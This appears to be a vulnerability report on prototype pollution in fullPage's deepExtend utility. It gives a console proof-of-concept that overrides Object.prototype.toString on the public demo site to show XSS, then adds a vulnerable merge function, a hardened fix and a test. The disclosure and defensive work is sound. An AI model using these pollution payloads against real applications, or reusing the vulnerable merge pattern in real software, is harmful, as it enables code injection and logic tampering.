fullPage utils are available to developers using window.fp_utils. They can use these utils for their own use-cases (other than fullPage) as well. However, one of the utils, deepExtend, is vulnerable to Prototype Pollution.
JavaScript is a prototype-based language, which means that when a new object is created, it inherits the predefined properties and methods of Object, such as toString, constructor, etc.
By exploiting a prototype pollution vulnerability, an attacker can overwrite or create properties on that Object type. If the victim developer uses such a property anywhere in the code, this can have a severe effect on the application.
For example:
var obj = {};
console.log(obj.A); // undefined
obj["__proto__"].A = 1;
console.log(obj.A); // 1
var new_obj = {};
console.log(new_obj.A); // 1 -> exploit
STEP 1: Visit https://alvarotrigo.com/fullPage demo.
STEP 2: Run the following code in the dev tools console.
NOTE: I am asking to run this in the console for PoC purposes only. The real-world exploitation scenario may vary.
var o = {};
o.toString();
var obj = window.fp_utils.deepExtend({},{"constructor": {"prototype": {"toString": () => {alert(`XSS via Prototype Pollution`)}}}});
STEP 3: Call the toString prototype function again:
o.toString();
and you will see an alert pop-up showing XSS exploitation.
Prototype pollution can be used to create or overwrite predefined properties and methods of the Object type. Depending on the application code, it can lead to XSS, changed code logic, DoS, etc.
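The bug and its fix in working form, as an added example that is not from the original report or from fullPage's source: a simplified recursive merge with the same class of flaw sits beside a hardened version, and both are run against a constructed payload of the same shape as the one above (a benign marker property stands in for the alert).

```javascript
// Constructed attacker payload: same shape as the report's, but it plants a
// harmless marker instead of replacing toString.
const PAYLOAD = '{"constructor":{"prototype":{"polluted":"yes"}}}';
const isObjectLike = (v) => v !== null && (typeof v === 'object' || typeof v === 'function');
const isPlainObject = (v) => Object.prototype.toString.call(v) === '[object Object]';
const hasOwn = (o, k) => Object.prototype.hasOwnProperty.call(o, k);
// Simplified recursive merge with the flaw described above (illustrative, not
// fullPage's real deepExtend): it descends into whatever target[key] already is,
// so the inherited "constructor" leads to Object and then to Object.prototype.
function vulnerableDeepExtend(target, ...sources) {
  for (const source of sources) {
    for (const key of Object.keys(source)) {
      const value = source[key];
      if (isObjectLike(value)) {
        if (!isObjectLike(target[key])) target[key] = {};
        vulnerableDeepExtend(target[key], value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}
// Hardened merge: rejects prototype-chain keys and only descends into the
// target's own plain-object properties, so inherited ones are never touched.
const UNSAFE_KEYS = new Set(['__proto__', 'constructor', 'prototype']);
function safeDeepExtend(target, ...sources) {
  for (const source of sources) {
    for (const key of Object.keys(source)) {
      if (UNSAFE_KEYS.has(key)) continue;
      const value = source[key];
      if (isPlainObject(value)) {
        if (!hasOwn(target, key) || !isPlainObject(target[key])) target[key] = {};
        safeDeepExtend(target[key], value);
      } else {
        target[key] = value;
      }
    }
  }
  return target;
}
// Merges the payload with each variant and checks whether a fresh, unrelated
// object picked up the marker; Object.prototype is restored in between.
function demo() {
  vulnerableDeepExtend({}, JSON.parse(PAYLOAD));
  const afterVulnerable = ({}).polluted;   // 'yes': every object now has it
  delete Object.prototype.polluted;
  safeDeepExtend({}, JSON.parse(PAYLOAD));
  const afterSafe = ({}).polluted;         // undefined: the key was rejected
  return { afterVulnerable, afterSafe };
}
```

The same check (create a fresh object after the merge and look for an unexpected property) is a cheap regression test to keep next to any deep-merge utility that accepts untrusted input.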